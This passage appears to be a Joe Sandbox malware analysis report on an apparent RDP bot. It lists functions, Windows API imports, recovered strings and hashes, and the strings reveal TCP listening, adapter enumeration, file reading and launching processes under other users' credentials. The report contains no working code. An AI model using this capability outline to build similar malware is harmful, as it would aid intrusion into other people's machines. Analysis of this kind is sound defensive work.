Instruction Fuzzy Hash: 95E0DF01F2839382FA7029690280B3586822F487C8FB614F88F0EE62EACD3EE4010C20

Function 00007FF76A9029FE Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
Instruction ID: 0ca9047366400e143abf462401c42acc1fa475ad9d2d02541a016700985859bf
Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
Instruction Fuzzy Hash: F4E0D801F1834281FA712569168073585812F447C4FB614F88F0ED62EACD3DE4010C20

Function 00007FF76A902990 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
Instruction ID: 459d7b9e9ee4ab082ca80c4bd4757cb9c06365d099181aac4fd4b86ab7f1ae0f
Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
Instruction Fuzzy Hash: 3BE0D801F1835381FA702569028073585822F487C4FB614F88F0ED62EACD3DE4010C20

Function 00007FF76A902989 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
Instruction ID: 8320e24e408a0708995b2709846fc3d0b05a25b6dd632650a37c26277b704e3b
Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
Instruction Fuzzy Hash: 90E02601F2839386FA7029690280B3586823F487C8FF614F88F0FE62EADD3EE4010C20

Function 00007FF76A902982 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
Instruction ID: 45873bccf2c4a53eb0bcbc1cd6d33f40c48dceff4a0177e79ec1dff5bfbf519a
Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
Instruction Fuzzy Hash: 58E02601F2839382FA7029690280B3586823F487C4FF614F88F0EE62EACD3EE0010C20

Function 00007FF76A9081E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetServiceStatus.SECHOST ref: 00007FF76A908205

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
Instruction ID: c0b7ba2fd6b772380b957079cab47adc5fdcd6ceeb4ec18334fc7c68ff9b29d1
Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
Instruction Fuzzy Hash: 2BD06775D19702C9F705FF05E845124B670BF49385FE090B9C10C92230CE2C6A598728

Function 00007FF76A9076D2 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00007FF76A9076E3

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: rand_s
String ID:
API String ID: 863162693-0
Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
Instruction ID: e7f4e532be69a4dade4dd10602b9e1090e044eaea4a6f33a18ee68383406f345
Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
Instruction Fuzzy Hash: DDC00226A18540CAD620AB24E845259A770EB98348FD04165E65D82664CA3CD61ACF54

Function 00007FFE0E165A47 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E165A55

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
Instruction ID: 577923021f62a84cc450fc2b12bcfc820c37eea88e8fe73bf3fe5af8c4d76798
Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
Instruction Fuzzy Hash: 55C08C50F1910AC2FB08A771B98103812206F9C700F001036C8EE42372CE1C98D94200

Non-executed Functions

Function 00007FFE11502BA8 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE11502BF8
HeapAlloc.KERNEL32 ref: 00007FFE11502C0C
GetAdaptersInfo.IPHLPAPI ref: 00007FFE11502C26
GetProcessHeap.KERNEL32 ref: 00007FFE11502C3D
HeapFree.KERNEL32 ref: 00007FFE11502C4E
GetProcessHeap.KERNEL32 ref: 00007FFE11502C58
HeapAlloc.KERNEL32 ref: 00007FFE11502C69
GetAdaptersInfo.IPHLPAPI ref: 00007FFE11502C83

Strings

mem_alloc, xrefs: 00007FFE11502D3A, 00007FFE11502D59
(pref_adapter_type != NULL), xrefs: 00007FFE11502CEE
net_info, xrefs: 00007FFE11502C95, 00007FFE11502CC5, 00007FFE11502CF5, 00007FFE11502D12, 00007FFE11502D76, 00007FFE11502DB5
[E] (%s) -> GetBestInterface failed(res=%08lx), xrefs: 00007FFE11502D19
H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE11502CB7, 00007FFE11502CE7
(adapter_num != NULL), xrefs: 00007FFE11502CBE
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11502D41, 00007FFE11502D60
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11502CCC, 00007FFE11502CFC
[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d), xrefs: 00007FFE11502DBC
[E] (%s) -> GetAdaptersInfo failed(res=%08lx), xrefs: 00007FFE11502C9C, 00007FFE11502D7D

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$AdaptersAllocInfo$Free
String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
API String ID: 2437369060-1325175688
Opcode ID: 564633fa592d41c422551b0d7afd0f666e805540f65a93ed4a43b2d479caf9d9
Instruction ID: eac23918928386c92b040667c34832290662f70ef7a807d69fc240047ce1ac13
Opcode Fuzzy Hash: 564633fa592d41c422551b0d7afd0f666e805540f65a93ed4a43b2d479caf9d9
Instruction Fuzzy Hash: 7151A361A0CE4795FB529F67E8502B83369AF443F4F8440BAD94E462B6EE2CE909C701

Function 00007FFE1150240A Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11502428
WSAGetLastError.WS2_32 ref: 00007FFE11502512

Part of subcall function 00007FFE1150233A: setsockopt.WS2_32 ref: 00007FFE1150236A

htonl.WS2_32 ref: 00007FFE1150245A
htons.WS2_32 ref: 00007FFE1150246B
bind.WS2_32 ref: 00007FFE11502484
listen.WS2_32 ref: 00007FFE11502499
WSAGetLastError.WS2_32 ref: 00007FFE115024AA

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

WSAGetLastError.WS2_32 ref: 00007FFE115024D4

Strings

tcp_listen, xrefs: 00007FFE115024BF, 00007FFE115024E9, 00007FFE11502523, 00007FFE11502557
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1150252A
[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE115024C6
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE1150255E
[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE115024F0

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: 7daf66edc36989b14c988206732aa7ab006f0ffe08b9452c87d7365b61838467
Instruction ID: e570b936057412f2c265d99973e7f0b15e8b7609a142eadcd2c6a3d4460a0f2c
Opcode Fuzzy Hash: 7daf66edc36989b14c988206732aa7ab006f0ffe08b9452c87d7365b61838467
Instruction Fuzzy Hash: 0631AE71A0CE0292E7619B6BA8501B8779AAF557B4F0403BADD7E472F1DF3CE4458701

Function 00007FF76A90737B Relevance: 6.3, Strings: 5, Instructions: 43COMMON

Download Yara Rule

Strings

H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF76A9073F0, 00007FF76A907420
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A907405, 00007FF76A907435
(len > 0), xrefs: 00007FF76A907427
(data != NULL), xrefs: 00007FF76A9073F7
crc32, xrefs: 00007FF76A9073FE, 00007FF76A90742E

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID:
String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
API String ID: 0-3120737415
Opcode ID: 491487d1d1b4d65f7a5c18aebf8645bc589bc03c6df1c50bbc29b2e00b29fdc1
Instruction ID: 6a50ae30ebc6baef3d5c26373cefff38024a8fa26f666ede778257182f28b474
Opcode Fuzzy Hash: 491487d1d1b4d65f7a5c18aebf8645bc589bc03c6df1c50bbc29b2e00b29fdc1
Instruction Fuzzy Hash: D2113D61948B47C9FA11FB1498003F8B761FF46395FE055F6D64D96290CF3CA60AD360

Function 00007FFE11504835 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE1150487A
fseek.MSVCRT ref: 00007FFE11504899
_errno.MSVCRT ref: 00007FFE115048AD
_errno.MSVCRT ref: 00007FFE115048C8
_errno.MSVCRT ref: 00007FFE11504987

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

_errno.MSVCRT ref: 00007FFE115049A2
_errno.MSVCRT ref: 00007FFE115049E0
fclose.MSVCRT ref: 00007FFE11504A35
_errno.MSVCRT ref: 00007FFE11504AD7
_errno.MSVCRT ref: 00007FFE11504AF2

Strings

[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FFE115048BC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11504904, 00007FFE11504937, 00007FFE1150496A
(buf_sz != NULL), xrefs: 00007FFE11504929
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FFE11504BB0
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115048EF, 00007FFE11504922, 00007FFE11504955
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11504C54
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FFE11504C7B
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FFE11504D6F
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FFE11504AE6
fs_file_read, xrefs: 00007FFE115048B5, 00007FFE115048FD, 00007FFE11504930, 00007FFE11504963, 00007FFE1150498F, 00007FFE11504A72, 00007FFE11504ADF, 00007FFE11504BA9, 00007FFE11504C74, 00007FFE11504D68, 00007FFE11504DED
NULL, xrefs: 00007FFE11504DDB
(path != NULL), xrefs: 00007FFE115048F6
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FFE1150495C
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FFE11504DF4
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FFE11504996
mem_alloc, xrefs: 00007FFE11504C4D

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4162578512
Opcode ID: cd132c142f990a62bbc12e9281bf62bd62eb44cea42565142062870364d5400f
Instruction ID: 5c28f5299b9105f52bfbe53882652c2d6da6fea10166c45b5c154f2595d52ead
Opcode Fuzzy Hash: cd132c142f990a62bbc12e9281bf62bd62eb44cea42565142062870364d5400f
Instruction Fuzzy Hash: 90D1AE62A08E4392FB129B97E8403BC3B5AAF507B5F8555BAD90E472B4DF3CE585C300

Function 00007FFE1150BD57 Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150BDE9
strcat.MSVCRT(00000000,?,?,?,?,?,?,?,00007FFE1150B115), ref: 00007FFE1150BF23
strlen.MSVCRT ref: 00007FFE1150BF39
strlen.MSVCRT ref: 00007FFE1150BF44
strlen.MSVCRT ref: 00007FFE1150BF78
strcat.MSVCRT(00000000,?,?,?,?,?,?,?,00007FFE1150B115), ref: 00007FFE1150BF88
strlen.MSVCRT ref: 00007FFE1150BFC6
strlen.MSVCRT ref: 00007FFE1150BFD3
strlen.MSVCRT ref: 00007FFE1150BFFC
strcat.MSVCRT(00000000,?,?,?,?,?,?,?,00007FFE1150B115), ref: 00007FFE1150C00E
LogonUserA.ADVAPI32 ref: 00007FFE1150C07E
GetLastError.KERNEL32 ref: 00007FFE1150C08C
CloseHandle.KERNEL32 ref: 00007FFE1150C357

Strings

h, xrefs: 00007FFE1150C51B
NULL, xrefs: 00007FFE1150C5DB, 00007FFE1150C5E7, 00007FFE1150C5F3, 00007FFE1150C5FF, 00007FFE1150C60B, 00007FFE1150C617, 00007FFE1150C623, 00007FFE1150C62F, 00007FFE1150C63B
(usr == NULL) || (pwd != NULL), xrefs: 00007FFE1150BEF3
(pi != NULL), xrefs: 00007FFE1150BE8B
[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FFE1150C5CA
(app != NULL), xrefs: 00007FFE1150BEBF
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FFE1150C24C
H:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFE1150BE84, 00007FFE1150BEB8, 00007FFE1150BEEC
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FFE1150C4D8
process_create, xrefs: 00007FFE1150BE52, 00007FFE1150BE92, 00007FFE1150BEC6, 00007FFE1150BEFA, 00007FFE1150C0AC, 00007FFE1150C245, 00007FFE1150C339, 00007FFE1150C3A8, 00007FFE1150C4D1, 00007FFE1150C5C3
[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FFE1150C0B3
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FFE1150BE59
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FFE1150C340
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150BE99, 00007FFE1150BECD, 00007FFE1150BF01
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FFE1150C3AF

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-931256089
Opcode ID: 54da3503b8f84a4a9f5f477847c2ca6ad28ea6d9660acc4c70a60580022221a9
Instruction ID: cec5c6d1e4ee9073eaca114ed46201a46ec6b20e8a5f42f76386a11994361911
Opcode Fuzzy Hash: 54da3503b8f84a4a9f5f477847c2ca6ad28ea6d9660acc4c70a60580022221a9
Instruction Fuzzy Hash: 81126FA590CF4381FB718B87E4403BD6399BB417A4F4401FADA4E466B4DF7CEA898701

Function 00007FFE1150B56F Relevance: 52.9, APIs: 11, Strings: 19, Instructions: 418stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1150B669
GetLastError.KERNEL32 ref: 00007FFE1150B747
strcmp.MSVCRT ref: 00007FFE1150B921
OpenProcess.KERNEL32 ref: 00007FFE1150B939
TerminateProcess.KERNEL32 ref: 00007FFE1150B953
GetLastError.KERNEL32 ref: 00007FFE1150B961
CloseHandle.KERNEL32 ref: 00007FFE1150BCCB

Strings

